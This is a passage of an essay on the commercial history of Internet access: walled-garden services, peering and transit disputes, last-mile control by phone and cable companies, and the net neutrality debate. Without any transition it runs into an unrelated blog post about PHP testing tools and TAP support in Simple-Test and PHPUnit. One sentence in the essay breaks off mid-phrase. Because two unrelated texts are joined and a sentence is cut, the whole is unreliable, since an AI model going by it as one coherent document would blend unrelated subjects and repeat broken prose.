Case One: Walled gardens

Parallel to the Internet, in the 1980s and 1990s, grew several
commercial networks whose names are mostly part of computing history:
Prodigy, CompuServe, and the one that managed to beat the odds,
America Online. These sites offered email, forums, and special content
to their users; they were often termed “walled gardens” because they
existed only for paid subscribers, and because the companies used
their content in bidding wars to win users to their exclusive service.

There was one form of competition, though, that none of the commercial
companies could beat. That was the Internet, a completely uncontrolled
repository of every imaginable thing anybody wanted to put up in
digital form. During the mid-90s, the users of the commercial services
demanded access to Internet riches, and soon there was little interest
in the special, limited-access forums. The companies gambled that they
could use the Internet as a lure to keep users in the walled
gardens–and they lost the gamble.

The functions of Prodigy and the rest are now split into two types of
business, both of which are thriving. One side of the split is pure
connectivity, the other pure content.

Internet service providers (ISPs) offer end-users raw physical access
to the Internet. Meanwhile, portals–which are experiencing a
resurgence, and of which Yahoo! is the most successful–offer
high-quality content attractions such as news and discussion forums.

Both businesses are becoming concentrated in fewer and larger
corporations, which is typical for maturing markets. And as the phone
company announcement showed, some companies are trying once again to
combine these functions. We’ll see later in the article whether this
attempt to create a new choke hold can succeed.

Case Two: Peering and transit charges

The Internet grew because companies strung lines between their routers
and connected to each other. No connections, no Internet.

This principle, in fact, lies at the heart of the term “Internet.”
For a long time, computer administrators have been running networks
that cover a department, a building, or a small campus. Each network
can be an Ethernet, a wireless network, or some other local area
network technology. Whenever the administrator connects two of these
networks, it’s called an “internet” (small “i”).

The vision of connecting all these networks globally led to the
capital-I Internet. It was brought to fruition by the simplicity and
flexibility of the TCP/IP protocols (and, some say, government
requirements that these protocols be used for communications with
government agencies).

At first, ISPs carried each other’s traffic for free. How else could
they imagine doing it? If they put up any barriers to connection,
they’d slow the growth of the miraculous Internet that increased the
value all providers could offer to their users. Furthermore, the
effort and cost of counting traffic, working out pricing systems, and
collecting payment didn’t seem worth the extra revenues they might
bring. Because everybody was equal in these halcyon days, building
connections was called “peering” (as in the modern term Peer-to-Peer).

By the late 1990s, though, hard-headed bean counters had taken over,
and a major change ensued. The largest ISPs and backbone owners
announced they would peer only with companies who could provide
comparable service to them–other companies would have to pay.

What was considered comparable? Comparable companies had to have a
certain geographic spread, accept a certain volume of traffic, and
meet various other criteria for reliability and service.

A lot of small providers complained, but this change was economically
necessary. End-users paid for the connections to the ISPs, but who
would pay for the lines that stretched for thousands of miles across
continents and between continents, carrying the Internet from one
far-flung ISP to another? The large ISPs who owned these thick bundles
of optical fibers, known as backbones, needed to charge to cover both
their sunk costs and their maintenance.

According to Fred Goldstein, principal at ionary Consulting, “Major
backbone operators (Tier 1, as they are called) were a new market that
had to create itself from the early noncommercial Internet. Not only
was there no dominant player, it was a cut-throat business in which
huge operators went bankrupt. Transit charges helped make the wider
Internet possible.”

Still, a whiff of oligopoly hangs over the issue. The large backbone
companies gambled that they could maintain a common front and force
smaller companies to pay extra. And this gamble, unlike the earlier
gamble of the walled garden companies, succeeded.

At that time, people also worried that large ISPs would employ
technical measures to make service for users on the same ISP better
than service for users on different ISPs. Certain ways to transmit
streaming data (audio and video) work better if a single company has
control over the whole route. Therefore, an ISP might be able to
market a “quality of service” that requires users at both ends to sign
up with that ISP.

This has not yet happened, perhaps because the need was not felt by
users (Voice over IP works pretty well on the current Internet, while
few people do video teleconferencing), and perhaps because the market
did not emerge for social and business reasons. (See my article

A Nice Way to Get Network Quality of Service?)

The peering controversy mostly died down in the 1990s, but it can
still pop up. In October of this year, a controversy between two
providers–Level 3 and Cogent–burst into public view. Level 3 wanted
Cogent to start paying for its connection, and to show its muscle, cut
off the connection to Cogent for three days. Subsequently they signed
a new agreement. But people using each provider who were trying to
access each other’s email or web pages found out that peering and
transit is a living controversy. (Some commentators attribute the
dispute to other business conflicts as well.)

Ironically, back in 1998 it was Level 3 who complained that larger
companies were charging it instead of peering. What’s fair or unfair
looks different from the two ends of a cable.

The only policy argument over ISP transit currently lies in the
international realm. ISPs in North America and Europe impose transit
charges on smaller ISPs in regions of the world that came to the
Internet more recently.

This has been a major bone of contention in international
communications policy for years. It comes up repeatedly at meetings of
the International Telecommunications Union and at that well-publicized
United Nations body on Internet issues, the World Summit on the
Information Society (WSIS). In fact, WSIS participants consider
peering and transit arrangements more important than the issue that
grabbed the headlines in the U.S., that of domain names and ICANN. So
transit is now a digital divide issue.

But independent analysts back the backbone operators. They consider
peering and transit not as policy but purely as business, privately
negotiated and covered by non-disclosure agreements. Chris Savage,
head of the Telecom/Internet practice at the law firm Cole, Raywid
& Braverman, says, “To avoid transit charges, an Internet provider
has to bring to the table (a) a lot of users, and/or (b) a lot of
highly valued content. The providers in the underdeveloped countries,
at least historically, have had neither.”

So the worldwide Internet is not the seamless universality that
idealists like to talk about, but rigidly segmented. The cost of my
accessing a Web page in Brazil, or even some rural parts of the U.S.,
are greater than my costs of accessing a Web page in Menlo Park,
California. It is not I, however, who pays the difference (though I
may well pay in the form of noticing a longer time delay during the
download).

Transit charges led to increased costs for small ISPs in the U.S., but
these didn’t made much difference in their profitability. What killed
most of these ISPs was the cost and difficulty of a very different
kind of connection: those between small phone carriers and the
established local phone companies. The battle over the last mile had
begun.

Case Three: Last-mile legerdemain

Aside from the transit charge controversies, Internet backbones
present little to fight over. This is because they have ample
bandwidth for current needs, partly because of the over-optimistic
investments of the dot-com boom.

Trouble arises only in the wires that connect the backbones to
individual homes and businesses: the so-called “last mile.” This is
what our traffic passes over when we sign up with a local Internet
service provider.

Originally, an ISP was just a company with a connection to an Internet
backbone. Customers dialed up the ISP just like they dialed up a
friend, and the phone company treated the call the same way. In the
early days, ISPs were often Mom-and-Pop operations; a computer
programmer might offer service as an adjunct to managing his or her
own Internet connection.

But as new technologies with higher-speed access emerged, ISPs
realized they had to start acting like phone companies. Some formed
close relationships with small, upstart phone companies, while others
created their own companies that traversed the regulatory maze to
offer phone service. The upstarts ran their own lines, or more often
rented lines from the old Bell phone company, the incumbent.

Once incumbent phone companies woke up and realized Internet business
was big business–both because the upstarts were successful, and
because cable companies started offering the Internet over cable
modems–they started marketing their own service, and redoubled their
efforts to cut off the competitive phone companies. These could not
survive without connecting to the incumbents. Who would sign up for
phone service or Internet service from a small company, if that
service reached only customers of that company?

In a dozen ways, incumbents made it hard for competing phone companies
to connect. Their numbers dropped precipitously during the late 1990s;
few exist today.

Now the ISPs themselves are in the incumbents’ direct sights. When the
incumbents build new, high-speed lines, they no longer are forced by
regulation to lease or share them with competing ISPs.

As for cable TV companies, U.S. regulations have ruled out any
requirement for them to serve competing ISPs, although Canadian
regulators have taken the opposite tack. ISPs in Canada still need to
buy service from companies with which they are in natural competition.

So the open Internet–the Internet cited at the beginning of this
article as an exemplary achievement of noncommercialism–now ends,
ironically, in choke holds. Incumbent phone companies and cable TV
companies both hold considerable market power, enforced by regulation.
The incumbent phone companies are the children of the break-up of
AT&T, a regulated monopoly; they still face only minimal
competition. The cable TV companies get franchises from cities and
towns, and often enjoy the sole cable franchise in each community.

The incumbents and cable companies are gambling that they can
re-establish walled gardens; that they can leverage the Internet to
tie customers to their high-revenue offerings. Goldstein says, “It’s
no coincidence that the companies are rolling out these plans after
most of the alternative phone companies and ISPs have disappeared.” A
key part of their gamble is that users won’t find viable competition
to move to.

So do incumbents and cable companies now own the Internet?

With this background we are almost ready to tackle the historic (and
perhaps histrionic) question asked at the beginning of this article.

First, we have to recognize that the Internet access offered by
incumbents and cable companies to home users is notably different from
Internet access as it was understood originally. In the early days,
bandwidth was equal in both directions. A typical Internet site was an
institution owning file, mail, and news servers; it hosted content.

When sites hosting content pushed it down their fat pipes
(high-bandwidth lines) and home users downloaded it on their small
pipes (dial-up lines), the users experienced the notorious “World Wide
Wait.”

The next step up in Internet access was ADSL (from phone companies)
and cable modems (from cable companies). But both are asymmetric
(that’s the A in ADSL). This is part of their design.

The providers expect you to request a web page (a very small
transmission in the upstream direction, perhaps just a couple dozen
bytes) and use most of your bandwidth downstream (which can easily be
tens of thousands of bytes, if the page contains images or
animations). Bandwidth is divided up accordingly. The model of
Internet access, ensconced in current ADSL or cable lines, is a
consumer model.

Markets in tandem with technology can often overcome limitations. So
perhaps, despite being relegated to the status of a consumer, you are
merrily blogging, putting up photos, and even posting songs and videos
(legally, I presume) on the Web. Most individuals do these things by
forming some kind of relationship with a hub on the Internet that has
fat pipes, powerful services, and terabytes of disk space. The
individual remains a consumer, but can piggyback on a producer.

Meanwhile, this market fuels the growth of portals, mentioned
earlier. Two example readily at hand are the popular site for posting
photos, Flickr, and the site for sharing favorite web sites,
deli.cio.us. Both were acquired by Yahoo! this year.

Because of bandwidth restrictions, and the physical nature of the
cable as a medium shared by hundreds of users, the terms of service
published by most cable companies rule out servers and peer-to-peer
applications. Some place absolute limits on traffic usage.

We should not be surprised that a cable company’s idea of Internet
access differs from the original meaning of the term. Cable companies
have always existed to deliver canned content of their choice with
graduated prices. When they discovered the Internet, they set aside
one channel for Internet traffic; the Internet became an incentive to
sign up for cable service, as it served the Prodigies and CompuServes
of the 1980s.

In other words, the cable company leopard never changed its spots; it
just let a monkey hop on its back for a ride. The lifespan of the
monkey is up for debate.

Phone companies have been watching the premiums charged by cable
companies for decades; now they see their opportunity to do the

Phone companies are finally ramping up better connections. But the new
plans would dedicate the new fat pipes to commercial vendors who pay
to use them. Personal, small-business, and community-organization
Internet sites would be ghettoized onto the current aging wires. And
the promise of innovative applications such as video teleconferencing
would remain a pipe dream.

In fact, such a policy would actually reduce incentives to build
faster connections. The phone companies would be able to keep using
the old ADSL lines, just marking traffic by its origin and favoring
the highest bidder. The change would increase revenue without
improving service.

Goldstein says, “The incumbent phone companies want to apply a
‘message unit’ model to web sites, who must either pay up (’800
model’) or become harder to reach (’hobo class’). And perhaps they’ll
even block all access outside of the walled garden. This is what they
set up on mobile phones, whose data services were never regulated.”

The goal of favoring one type of content over another can be fulfilled
through a technology called differentiated service. This is not
something new, nor is it the result of oligopolistic conspiracy.
Research into this area has gone on for many years, and many Internet
tools support differentiated service.

Differentiated service lets administrators choose routes for data by
multiple criteria, and let through traffic between certain users while
holding up other traffic. The important criterion might be how fast a
single request gets to its destination, or how fast a heavy stream of
traffic gets through in the aggregate. Reliability and cost can also
be factors; each factor assumes a different way of handling traffic.

For a long time, the business goal behind much of this research was to
allow ISPs to provide different quality of service to different
customers, and to charge for the difference. The attempt has mostly
been a failure, as I mentioned earlier.

But differentiated service has a new lease on life, and it’s much more
closely targeted to users and content. Particular types of traffic
(identified, for instance, by port number) and particular sources and
destinations can be either favored or penalized.

The first suggestion that cable and phone companies could employ
differentiated service to prefer particular content came in 1999, when
Cisco Systems, the leading maker of Internet routing equipment,
introduced a router specifically marketed to these companies and
promising sophisticated ways to enforce preferential treatment.

Public interest groups such as Consumer Project on Technology jumped
on this development. They criticized Cisco, and by extension its
potential customers, heavily. But it’s hard to criticize a technology
developed, with support from standards, over many years with many
useful applications. It’s also hard to criticize companies for using
technology to direct consumers to their own content. That would be
asking the leopard to change its spots.

So now we can make a stab at predicting the outcome of the trend
toward creating new Internet haves and have-nots. The question should
be what constitutes an anti-competitive practice.

What forced the issue into public view is a bill in Congress that
would explicitly stop preferential treatment and mandate “neutrality”
in Internet service. The phone companies want this clause removed.

Historically, the Federal Communications Commission has tried to leave
the Internet unregulated, but at key moments it has often laid down
rules concerning the interactions between Internet services and the
larger communications environment that the FCC is responsible
for. Most recently, they fined a phone company for blocking a
Voice-over-IP provider; the phone company had clearly seen the
provider as a competitor and was using its position as a choke point
to curb that competition.

The FCC has freed incumbent phone companies, in one ruling after
another, from the need to support competitors. The trend in Congress
seems to approve. As mentioned before, cable companies have always had
that freedom in the United States. But discriminating in Internet
access may be a drastic change the FCC cannot stomach, a
bait-and-switch approach to offering Internet service–and Congress
may feel the same way.

Savage says, “It would not surprise me if, regarding Internet access,
the FCC will matter more over the next three to five years than it has
in the past. This is because the two kinds of entities that will now
be providing the overwhelming majority of consumer Internet access are
incumbent telephone companies and cable operators, which the FCC has
traditionally viewed as generally within its regulatory ambit.”

We should not sing a dirge over competition, either. Old competition
has been vanquished, but new forms poke their shoots up.

A second cable company offers competition in some areas. Cellular
phone companies (some owned by the incumbent phone companies and some
independent) are rolling out Internet services, although not very fast
in North America. And in rural areas many people connect to wireless
ISPs. Wireless is expected to become a more and more common solution
to the last mile. In some areas it may be offered by a powerful new
standard called WiMAX.

Municipalities are also getting into the act. The more games companies
play with access, the more pressure will grow in the public for their
municipal governments to provide alternatives. And while the phone
companies anticipated this movement and worked hard to pass laws in
many states to prohibit municipal networks (a Philadelphia case made a
particularly large news impact), more and more public officials and
experts are coming out in favor of them. In Philadelphia, with phone
company obstructionism exposed to public view, a compromise was
arranged.

I don’t think we need to panic over the two-tier Internet. Attempts to
monopolize the Internet have failed before, and there are many factors
in both the business and the legal frameworks to prevent it from
happening again. We will always experience tensions between business
models and the public good. But it’s clear that, around the world,
people want their Internet. Ultimately they’ll get it.

Related link: http://shiflett.org/archive/176

The tutorial that Geoff Young and I gave at ApacheCon has sparked some discussion (mostly via email) that I think will lead to better testing tools for PHP developers. A PDF of our slides is now available:

• Power PHP Testing (PDF)

Geoff also has some tarballs available that let you test a very simple PHP library (functions.inc) with Apache-Test, Simple-Test, PHPUnit, and phpt:

• http://people.apache.org/~geoff/power-php-testing/

One of the tarballs demonstrates how to use the Simple-Test testing library within the Apache-Test testing framework. This is thanks to the work of Mike Lively, who has documented his work in his blog:

• I Think I Finally Understand Apache-Test (Mon, 25 Apr 2005)
• TAP Format Explained (Wed, 04 May 2005)
• Implementing Apache-Test Support into Simple-Test (Thu, 05 May 2005)
• Updated Simple-Test + Apache-Test (Thu, 15 Dec 2005)

His most recent tarball contains everything you need to use these two tools together.

After we mentioned TAP (Test Anything Protocol) to Sebastian Bergmann, he added TAP support to PHPUnit. Now, at least conceptually, you can also use PHPUnit to write your tests. This gives PHP developers three choices for writing tests within the Apache-Test framework:

• The bundled PHP port of Test::More
• Simple-Test with the TAP Reporter
• PHPUnit with the TAP Logger

We’ve also been discussing the various advantages and disadvantages of each tool as well as how we might be able to help make testing easier for PHP developers. One of the perspectives I’ve been highlighting is best stated by Matthew Weier O’Phinney in his blog:

I find writing the tests tedious. In Simple-Test, as in PHPUnit, you need to create a class that sets up the testing harness, and then you create a method for each test you wish to run, and so on. I found it incredibly time consuming.

I don’t think Matthew knew about Apache-Test’s Test::More library (it’s as simple and straightforward as phpt tests), but this illustrates one of the disadvantages of testing tools that require a lot of overhead - they raise the barrier of entry (and they don’t really fit in with the “PHP way” of solving problems as simply and directly as possible). This was one of the reasons why I ported Perl’s Test::More library to PHP - it’s very simple and doesn’t get in your way. It also works with many mature testing tools already available (such as Apache-Test), because it’s TAP-compliant.

Note: Sebastian says he’s working on adding phpt support to PHPUnit in an attempt to lower the barrier of entry.

On a related note, it looks like there will be a talk about this stuff at the 2006 PHP Quebec conference called Using Test::Harness to Test PHP Applications:

The Perl community has long had a very powerful unit-testing tool available: Test::Harness and friends. It uses what the Perl people call TAP - the Test Anything Protocol. I’ve used the Perl framework myself to verify correct behaviour in Perl modules and the Apache Web server. It came as a surprise to me that there was apparently no port of the technology to PHP, and so I’ve done some work toward correcting that. This session will include an introduction to the technology, a description of the implementation, and examples of how it can be used to test PHP applications.

Ken is a few years late to the party, but I think his interest highlights the usefulness of these tools. (He’s been notified that this work has already been done, so hopefully it can save him some wasted time.) With any luck, Ken will not only talk about the PHP port of Test::More but also the TAP support that is now available in Simple-Test and PHPUnit.

Do you test your PHP applications?